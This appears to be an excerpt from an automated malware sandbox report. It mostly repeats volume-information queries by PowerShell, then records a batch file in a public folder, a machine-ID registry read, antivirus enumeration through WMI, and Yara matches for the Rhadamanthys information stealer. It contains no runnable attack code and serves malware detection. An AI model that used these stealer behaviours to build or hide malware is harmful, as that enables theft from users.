Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files\Windows Media Player\wmprph.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmprph.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\Public\ajbs50ul.bat

Code function: 4_2_00007FF63D2794D0 GetCurrentProcessId,ProcessPrng,CreateNamedPipeW,GetLastError,CloseHandle,CloseHandle,

4_2_00007FF63D2794D0

Source: C:\Users\Public\ajbs50ul.bat

Code function: 4_2_00007FF63D26E220 GetSystemTimePreciseAsFileTime,

4_2_00007FF63D26E220

Source: C:\Windows\System32\OpenWith.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 0000000E.00000003.1733264637.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1772221691.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1770896929.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1776058273.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1774245020.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1772517480.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1661729076.000000001BA01000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1751813778.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1744735797.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1741663241.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1752960096.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1764199832.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1773158578.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1758049624.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.1767980994.000001F9E0D8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
